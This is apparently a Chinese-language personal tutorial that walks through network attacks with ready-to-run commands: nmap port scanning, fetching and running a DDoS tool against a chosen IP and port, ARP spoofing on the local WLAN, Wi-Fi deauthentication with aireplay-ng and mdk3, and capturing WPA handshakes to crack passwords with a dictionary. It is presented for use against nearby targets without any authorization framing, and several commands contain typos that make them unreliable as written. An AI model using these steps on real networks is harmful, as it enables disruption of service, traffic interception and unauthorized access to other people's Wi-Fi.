端口扫描
需要使用nmap工具
sudo nmap -sT -p- 192.168.8.51
。-sT
选项告诉 nmap
扫描TCP端口, -p-
扫描所有端口(65535个)
也可以指定端口
sudo nmap -sT -p 53 192.168.8.51
DDOS攻击
下载攻击工具:
git clone https://github.com/Andysun06/ddos
进入工具文件夹
使用python3运行攻击工具,输入ip和端口就可以了
ARP欺骗攻击
apt-get install dsniff
使用ifconfig找到对应的网卡
然后嗅探你所在WLAN下所有设备的IP地址,命令如下:
1 | fping -g 本机IP地址/24 |
先获得root权限,输入以下命令:
1 | sudo su |
然后输入以下命令:
1 | arpspoof -i 你的网卡名称 -t 攻击目标的IP地址 攻击目标的网关地址 |
取消认证攻击
安装aircrack-ng工具 apt install aircrack-ng
将网卡设置成监听模式**
1 | sudo airmon-ng start 网卡名 |
注意在开启监听后网卡名称可能会发生改变可使用
ifconfig
进行查看
探测周边无限信号
1 | airodump-ng 网卡名 # 该方法只能探测2.4G平段 |
检查接入情况
确定要攻击的目标网路,可以输入下面命令观察目标网络及其连入客户端的情况:
1 | airodump-ng -d AP的MAC地址 网卡名称 //随机信道 |
发起攻击
1 | aireplay-ng -0 1000 -a AP的MAC -c 目标的MAC -D 网卡名 |
比如:
1 | aireplay-ng -0 1000 -a 04:F9:F8:C0:15:D9 -c 20:47:DA:AF:C4:3C -D wlp45s0mon |
mdk3
将信息写入文件中
- echo AP的MAC地址 > blist.txt
将要攻击的目标 AP 的 MAC 写到一个文件中。 - mdk3 网卡名称 d -c 1 -b blist.txt
破解密码
可先升级成root权限,方便后面操作sudo -i
将网卡设置为监听模式sudo airmon-ng start 网卡名
注意在开启监听后网卡名称可能会发生改变可使用
ifconfig
进行查看
扫描wifi
1 | airodump-ng 网卡名称 |
1 | MAC地址 信号强度 信道 wifi名称 |
抓握手包
1 | airodump-ng -w freedom -c 信道 --bssid AP的MAC地址 网卡名称 -ignore-nefative-oneaa |
会车后就会开始监听
在监听页面会显示在那个wifi下连接的用户,记住那个用户的MAC地址来进行下一步的操作
1 | CH 6 ][ GPS *** No Fix! *** ][ Elapsed: 12 s ][ 2024-03-24 13:12 |
进行取消认证攻a击让连接该wifi的用户断开连接
1 | aireplay-ng -0 1000 -a AP的MAC -c 目标的MAC -D 网卡名 |
在执行了一会后按ctrl+c
或ctrl+Z
停止攻击,等待用户机重联
回到抓包的窗口查看,如果抓到了了握手包则在顶部会显示:
1 | 会显示这个 |
1 | 在目录下会生成一个.ivs文件,然后找一个字典,等会跑字典 |
1 | ircrack-ng -w 密码字典文件路径 ivs文件路径 |
如果成功了会显示
1 | KEY FOUND [123456] |
失败了(字典中没有)
1 | KEY NOT FOUND |